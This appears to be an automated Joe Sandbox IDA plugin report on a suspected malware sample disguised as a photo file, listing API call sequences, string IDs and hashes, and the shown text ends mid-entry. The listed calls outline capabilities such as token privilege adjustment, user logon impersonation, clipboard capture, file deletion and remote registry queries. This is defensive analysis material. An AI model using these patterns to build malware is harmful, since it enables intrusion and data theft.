                                                                      • API String ID: 1155518417-2988720461
                                                                      • Opcode ID: 561bd339cefef3f14253374b244a4b644240838149a9fab433d47853a0a14a98
                                                                      • Instruction ID: 6c3f8ad1c96559194ee99a41e66d94c0145e9b57211baaaa98249b559010bb71
                                                                      • Opcode Fuzzy Hash: 561bd339cefef3f14253374b244a4b644240838149a9fab433d47853a0a14a98
                                                                      • Instruction Fuzzy Hash: 33318371A50328BEEB306BA15D49FBF7E7CEB45B64F141426F601E62D1C6B15D00AA70
                                                                      APIs
                                                                        • Part of subcall function 00D71607: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00D71651
                                                                        • Part of subcall function 00D71607: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00D7167E
                                                                        • Part of subcall function 00D71607: GetLastError.KERNEL32 ref: 00D7168E
                                                                      • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00D711CA
                                                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00D711EC
                                                                      • CloseHandle.KERNEL32(?), ref: 00D711FD
                                                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00D71215
                                                                      • GetProcessWindowStation.USER32 ref: 00D7122E
                                                                      • SetProcessWindowStation.USER32(00000000), ref: 00D71238
                                                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00D71254
                                                                        • Part of subcall function 00D71003: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00D71140), ref: 00D71018
                                                                        • Part of subcall function 00D71003: CloseHandle.KERNEL32(?,?,00D71140), ref: 00D7102D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                      • String ID: $default$winsta0
                                                                      • API String ID: 22674027-1027155976
                                                                      • Opcode ID: 87557b811d9a0dd7fab8cd032f4224cdde49372589e5f49aa02d0a63a5fbc948
                                                                      • Instruction ID: 4483abe75142d5e5dbde96cfa365f2503d09b803c991f24bb6d6f7ff4c138cdf
                                                                      • Opcode Fuzzy Hash: 87557b811d9a0dd7fab8cd032f4224cdde49372589e5f49aa02d0a63a5fbc948
                                                                      • Instruction Fuzzy Hash: 6E818F75900309ABDF119FA8DC49BEE7BB8EF05314F188229F918E62A0E7758945CB70
                                                                      APIs
                                                                        • Part of subcall function 00D7103D: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00D71058
                                                                        • Part of subcall function 00D7103D: GetLastError.KERNEL32(?,00000000,00000000,?,?,00D70ADF,?,?,?), ref: 00D71064
                                                                        • Part of subcall function 00D7103D: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00D70ADF,?,?,?), ref: 00D71073
                                                                        • Part of subcall function 00D7103D: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00D70ADF,?,?,?), ref: 00D7107A
                                                                        • Part of subcall function 00D7103D: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00D71091
                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00D70B10
                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00D70B44
                                                                      • GetLengthSid.ADVAPI32(?), ref: 00D70B5B
                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00D70B95
                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00D70BB1
                                                                      • GetLengthSid.ADVAPI32(?), ref: 00D70BC8
                                                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00D70BD0
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00D70BD7
                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00D70BF8
                                                                      • CopySid.ADVAPI32(00000000), ref: 00D70BFF
                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00D70C2E
                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00D70C50
                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00D70C62
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D70C89
                                                                      • HeapFree.KERNEL32(00000000), ref: 00D70C90
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D70C99
                                                                      • HeapFree.KERNEL32(00000000), ref: 00D70CA0
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D70CA9
                                                                      • HeapFree.KERNEL32(00000000), ref: 00D70CB0
                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00D70CBC
                                                                      • HeapFree.KERNEL32(00000000), ref: 00D70CC3
                                                                        • Part of subcall function 00D710D7: GetProcessHeap.KERNEL32(00000008,00D70AF5,?,00000000,?,00D70AF5,?), ref: 00D710E5
                                                                        • Part of subcall function 00D710D7: HeapAlloc.KERNEL32(00000000,?,00000000,?,00D70AF5,?), ref: 00D710EC
                                                                        • Part of subcall function 00D710D7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00D70AF5,?), ref: 00D710FB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                      • String ID:
                                                                      • API String ID: 4175595110-0
                                                                      • Opcode ID: 6dc43eed8dbcc4e8a97accb355f6b58e274214e81272b856e7d5de02639bb33b
                                                                      • Instruction ID: b6d8f696a8072cf6cca0809ee3f48af3e68d3e554e896bd4752ee1dcb7453586
                                                                      • Opcode Fuzzy Hash: 6dc43eed8dbcc4e8a97accb355f6b58e274214e81272b856e7d5de02639bb33b
                                                                      • Instruction Fuzzy Hash: CA715E71A00209EBDF119FA4DD48FAEBBB8FF05310F189215E919E7291EB719A05CB70
                                                                      APIs
                                                                      • OpenClipboard.USER32(00DAD0D0), ref: 00D8EA50
                                                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 00D8EA5E
                                                                      • GetClipboardData.USER32(0000000D), ref: 00D8EA6A
                                                                      • CloseClipboard.USER32 ref: 00D8EA76
                                                                      • GlobalLock.KERNEL32(00000000), ref: 00D8EAAE
                                                                      • CloseClipboard.USER32 ref: 00D8EAB8
                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00D8EAE3
                                                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 00D8EAF0
                                                                      • GetClipboardData.USER32(00000001), ref: 00D8EAF8
                                                                      • GlobalLock.KERNEL32(00000000), ref: 00D8EB09
                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00D8EB49
                                                                      • IsClipboardFormatAvailable.USER32(0000000F), ref: 00D8EB5F
                                                                      • GetClipboardData.USER32(0000000F), ref: 00D8EB6B
                                                                      • GlobalLock.KERNEL32(00000000), ref: 00D8EB7C
                                                                      • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00D8EB9E
                                                                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00D8EBBB
                                                                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00D8EBF9
                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00D8EC1A
                                                                      • CountClipboardFormats.USER32 ref: 00D8EC3B
                                                                      • CloseClipboard.USER32 ref: 00D8EC80
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                      • String ID:
                                                                      • API String ID: 420908878-0
                                                                      • Opcode ID: 5ebfeed51ba5333244fe0f4064684d8cd199cab5504dfc066903549c980e1494
                                                                      • Instruction ID: 32333c95f8ef61dc76c493faf8448459b0ccc13a999296dab4ca2d1e78235440
                                                                      • Opcode Fuzzy Hash: 5ebfeed51ba5333244fe0f4064684d8cd199cab5504dfc066903549c980e1494
                                                                      • Instruction Fuzzy Hash: BD61BA31204301AFD310EF64E894F6AB7A8EF85724F08551DF496C72A2DB71E985CBB2
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00D868DC
                                                                      • FindClose.KERNEL32(00000000), ref: 00D86930
                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00D8696C
                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00D86993
                                                                        • Part of subcall function 00D1B606: _wcslen.LIBCMT ref: 00D1B610
                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D869D0
                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D869FD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                      • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                      • API String ID: 3830820486-3289030164
                                                                      • Opcode ID: 7f338e969e584db34c23455f5ee987154d8139124e1343f388953edf807224d5
                                                                      • Instruction ID: d7fa60ec7412aaa656e4e65ccab7b732997b458ad063a40c772f08e4310866a6
                                                                      • Opcode Fuzzy Hash: 7f338e969e584db34c23455f5ee987154d8139124e1343f388953edf807224d5
                                                                      • Instruction Fuzzy Hash: BFD13D72508340AEC310EFA5D881EABB7ECEF89714F04491EF585C6291EB75DA48CB72
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00D89581
                                                                      • GetFileAttributesW.KERNEL32(?), ref: 00D895BF
                                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 00D895D9
                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00D895F1
                                                                      • FindClose.KERNEL32(00000000), ref: 00D895FC
                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00D89618
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00D89668
                                                                      • SetCurrentDirectoryW.KERNEL32(00DD6B80), ref: 00D89686
                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00D89690
                                                                      • FindClose.KERNEL32(00000000), ref: 00D8969D
                                                                      • FindClose.KERNEL32(00000000), ref: 00D896AD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                      • String ID: *.*
                                                                      • API String ID: 1409584000-438819550
                                                                      • Opcode ID: 1d3286912c16ceeec1a8142f4294f28256890d69ff36d82f52cc77ca5bcdc496
                                                                      • Instruction ID: 20ec4e5749e10e83aecf062560fdee11a43204a2e0d0b3e2cd2af2aed51542ce
                                                                      • Opcode Fuzzy Hash: 1d3286912c16ceeec1a8142f4294f28256890d69ff36d82f52cc77ca5bcdc496
                                                                      • Instruction Fuzzy Hash: B231A3316013196FDB10EBB4EC59BEEB3ACDF46320F184196E895E2190EB71DD458B74
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 665dad7364a5f1ca51da91a372415b92c259ab973f0714e62f2096e2c2d76cefda11b2ca87de3ae337683726e470a833bfd0f8df2909bb2d76ae13d1a678c6e642$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                      • API String ID: 0-3989967663
                                                                      • Opcode ID: 20c538def0162537218b51ffb14da3f9b9cc2a6525519908e83a314d87102c2d
                                                                      • Instruction ID: ef6c71c23785fdd2a330d1fe0097c284e4ef0cfae4548235825eb4ff524aa013
                                                                      • Opcode Fuzzy Hash: 20c538def0162537218b51ffb14da3f9b9cc2a6525519908e83a314d87102c2d
                                                                      • Instruction Fuzzy Hash: A3728271E002299BDB24CF59D8807BEB7B5EF54314F14826BE845EB285EB709D81DBB0
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00D896DC
                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00D89737
                                                                      • FindClose.KERNEL32(00000000), ref: 00D89742
                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00D8975E
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00D897AE
                                                                      • SetCurrentDirectoryW.KERNEL32(00DD6B80), ref: 00D897CC
                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00D897D6
                                                                      • FindClose.KERNEL32(00000000), ref: 00D897E3
                                                                      • FindClose.KERNEL32(00000000), ref: 00D897F3
                                                                        • Part of subcall function 00D7DA03: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00D7DA1E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                      • String ID: *.*
                                                                      • API String ID: 2640511053-438819550
                                                                      • Opcode ID: d78f006dbde24d01ee6a1b7a6a4ba1e6945d68a7821a811049f472424db8982f
                                                                      • Instruction ID: 362103acdd391c2bb0ec225e404c7146f2d4eeefea41ee5b3ed46e7d5d2658b3
                                                                      • Opcode Fuzzy Hash: d78f006dbde24d01ee6a1b7a6a4ba1e6945d68a7821a811049f472424db8982f
                                                                      • Instruction Fuzzy Hash: E031C1326003197ECF10BFA4EC58AEEB7ADDF06360F184152E890E21A0EB30DE458B74
                                                                      APIs
                                                                        • Part of subcall function 00D9C8BF: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00D9B5D5,?,?), ref: 00D9C8DC
                                                                        • Part of subcall function 00D9C8BF: _wcslen.LIBCMT ref: 00D9C918
                                                                        • Part of subcall function 00D9C8BF: _wcslen.LIBCMT ref: 00D9C98F
                                                                        • Part of subcall function 00D9C8BF: _wcslen.LIBCMT ref: 00D9C9C5
                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00D9BE65
                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00D9BED0
                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00D9BEF4
                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00D9BF53
                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00D9C00E
                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00D9C07B
                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00D9C110
                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00D9C161
                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00D9C20A
                                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00D9C2A9
                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00D9C2B6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                      • String ID:
                                                                      • API String ID: 3102970594-0
                                                                      • Opcode ID: aefcbcbfbd77d9731b9aa12726f97813816e45a296d36c84e9c6528044a80871
                                                                      • Instruction ID: 11b7f16ecf94148953e67810dd5f2d9575a6356ddc923ba50bc9ad6611b35201
                                                                      • Opcode Fuzzy Hash: aefcbcbfbd77d9731b9aa12726f97813816e45a296d36c84e9c6528044a80871
                                                                      • Instruction Fuzzy Hash: 88027F71614200AFDB14DF64D891E2ABBE5EF89314F18849DF849CB2A2DB31ED45CBB1
                                                                      APIs
                                                                      • GetLocalTime.KERNEL32(?), ref: 00D88175
                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D88185
                                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00D88191
                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00D8822E
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00D88242
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00D88274
                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00D882AA
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00D882B3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentDirectoryTime$File$Local$System
                                                                      • String ID: *.*
                                                                      • API String ID: 1464919966-438819550
                                                                      • Opcode ID: b9a5861a5b1489f00016ff716619fc3c1fb7c18ca3caf5f886e4c81c2d4b4593
                                                                      • Instruction ID: bc2cf3e6478518f13dc244b2a105af8bce16f0f6e6b6790cc87f813fc058953c
                                                                      • Opcode Fuzzy Hash: b9a5861a5b1489f00016ff716619fc3c1fb7c18ca3caf5f886e4c81c2d4b4593
                                                                      • Instruction Fuzzy Hash: 3E614672504705AFCB10EF60D845AAEB3E8FF89310F44891AF98987251EF35E945CBB2
                                                                      APIs
                                                                        • Part of subcall function 00D1592D: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D15922,?,?,00D148AA,?,?,?,00000000), ref: 00D1594D
                                                                        • Part of subcall function 00D7E0B7: GetFileAttributesW.KERNEL32(?,00D7CEB3), ref: 00D7E0B8
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00D7D040
                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00D7D0FB
                                                                      • MoveFileW.KERNEL32(?,?), ref: 00D7D10E
                                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 00D7D12B
                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00D7D155
                                                                        • Part of subcall function 00D7D1BA: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00D7D13A,?,?), ref: 00D7D1D0
                                                                      • FindClose.KERNEL32(00000000,?,?,?), ref: 00D7D171
                                                                      • FindClose.KERNEL32(00000000), ref: 00D7D182
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                      • String ID: \*.*
                                                                      • API String ID: 1946585618-1173974218
                                                                      • Opcode ID: d869693edf138f23a5f45e24a4ed896eea0db6b7bb2d77e2999823e6baba759c
                                                                      • Instruction ID: 78d56ea410d1c77590a6ff3d131ec70c05f2a531d88a2ea575fcced63a3e92f0
                                                                      • Opcode Fuzzy Hash: d869693edf138f23a5f45e24a4ed896eea0db6b7bb2d77e2999823e6baba759c
                                                                      • Instruction Fuzzy Hash: FA615D31801249ABCF01EBE0DA529EDBBB6EF15314F64806AE805B7191EF715F4ACB71
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                      • String ID:
                                                                      • API String ID: 1737998785-0
                                                                      • Opcode ID: c03863630d0d4d5d1b732a3e32f84f7970b6975a9894e239503c333add88873b
                                                                      • Instruction ID: c1c757646759c75c6201103f3574ba2019382223a7dd8c1dc12979c919b0553d
                                                                      • Opcode Fuzzy Hash: c03863630d0d4d5d1b732a3e32f84f7970b6975a9894e239503c333add88873b
                                                                      • Instruction Fuzzy Hash: E7419C35204601AFD721EF15E888B19BBE4EF45328F18C099E8258B762DB75EC46CFB0
                                                                      APIs
                                                                        • Part of subcall function 00D71607: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00D71651
                                                                        • Part of subcall function 00D71607: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00D7167E
                                                                        • Part of subcall function 00D71607: GetLastError.KERNEL32 ref: 00D7168E
                                                                      • ExitWindowsEx.USER32(?,00000000), ref: 00D7E850
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
